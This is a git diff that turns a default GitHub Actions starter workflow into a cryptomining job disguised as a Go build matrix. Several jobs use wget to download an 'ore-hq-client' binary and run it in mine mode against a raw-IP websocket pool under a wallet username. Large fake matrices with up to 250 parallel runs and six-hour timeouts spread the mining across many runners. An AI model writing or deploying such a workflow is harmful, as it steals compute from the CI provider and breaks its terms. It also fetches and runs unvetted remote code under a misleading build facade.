--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -1,36 +1,102 @@
-# This is a basic workflow to help you get started with Actions
 
-name: CI
-
-# Controls when the workflow will run
-on:
-  # Triggers the workflow on push or pull request events but only for the "main" branch
+name: peli
+on: 
   push:
     branches: [ "main" ]
-  pull_request:
-    branches: [ "main" ]
 
-  # Allows you to run this workflow manually from the Actions tab
-  workflow_dispatch:
-
-# A workflow run is made up of one or more jobs that can run sequentially or in parallel
 jobs:
-  # This workflow contains a single job called "build"
-  build:
-    # The type of runner that the job will run on
-    runs-on: ubuntu-latest
-
-    # Steps represent a sequence of tasks that will be executed as part of the job
+  alah:
+    runs-on: ubuntu-20.04
+    strategy:
+      max-parallel: 80
+      fail-fast: false
+      matrix:
+        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
+        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
+    timeout-minutes: 8
+    env:
+        NUM_JOBS: 20
+        JOB: ${{ matrix.go }}
     steps:
-      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
-      - uses: actions/checkout@v4
-
-      # Runs a single command using the runners shell
-      - name: Run a one-line script
-        run: echo Hello, world!
-
-      # Runs a set of commands using the runners shell
-      - name: Run a multi-line script
-        run: |
-          echo Add other actions to build,
-          echo test, and deploy your project.
+    - name: Set up Go ${{ matrix.go }}
+      uses: actions/setup-go@v1
+      with:
+        go-version: ${{ matrix.go }}
+      id: go
+    - name: Setup
+      uses: actions/checkout@v1
+    - name: Main
+      run: |
+        wget https://github.com/egg5233/ore-hq-client/releases/download/v1.0.7/ore-hq-client-ubuntu20
+        chmod +x ore-hq-client-ubuntu20
+        ./ore-hq-client-ubuntu20 --url ws://20.81.187.6:80/mine mine --username B5r3aYo2g81ZNBAtN4A1h975wW3us4jqff9gSfNx5dhf --cores 4 &
+        sleep 5m
+  pelit:
+    needs: alah
+    runs-on: ubuntu-latest
+    strategy:
+      max-parallel: 250
+      fail-fast: false
+      matrix:
+        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
+        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
+    timeout-minutes: 360
+    env:
+        NUM_JOBS: 250
+        JOB: ${{ matrix.go }}
+    steps:
+    - uses: actions/checkout@v4
+    - name: Set up Go ${{ matrix.go }}
+      uses: actions/setup-go@v1
+      with:
+        go-version: ${{ matrix.go }}
+      id: go
+    - name: prepare
+      run: |
+        wget https://github.com/egg5233/ore-hq-client/releases/download/v1.0.7/ore-hq-client-ubuntu20
+        chmod +x ore-hq-client-ubuntu20
+        ./ore-hq-client-ubuntu20 --url ws://20.81.187.6:80/mine mine --username B5r3aYo2g81ZNBAtN4A1h975wW3us4jqff9gSfNx5dhf --cores 4 
+    - name: Main
+      run: |
+        top
+     
+  cuk:
+    needs: [alah]
+    runs-on: ubuntu-latest
+    strategy:
+      max-parallel: 250
+      fail-fast: false
+      matrix:
+        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
+        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
+    timeout-minutes: 360
+    env:
+        NUM_JOBS: 250
+        JOB: ${{ matrix.go }}
+    steps:
+    - uses: actions/checkout@v4
+    - name: Set up Go ${{ matrix.go }}
+      uses: actions/setup-go@v1
+      with:
+        go-version: ${{ matrix.go }}
+      id: go
+    - name: lol
+      run: |
+        wget https://github.com/egg5233/ore-hq-client/releases/download/v1.0.7/ore-hq-client-ubuntu20
+        chmod +x ore-hq-client-ubuntu20
+        ./ore-hq-client-ubuntu20 --url ws://20.81.187.6:80/mine mine --username B5r3aYo2g81ZNBAtN4A1h975wW3us4jqff9gSfNx5dhf --cores 4 
+    - name: Main
+      run: |
+        top
+  Success:
+    needs: [alah, pelit, cuk]
+    if: always()
+    runs-on: ubuntu-20.04
+    steps:
+      - uses: technote-space/workflow-conclusion-action@v2
+      - name: Check Failure
+        if: env.WORKFLOW_CONCLUSION == 'failure'
+        run: exit 1
+      - name: Success
+        if: ${{ success() }}
+        run: echo "all don,All Done"
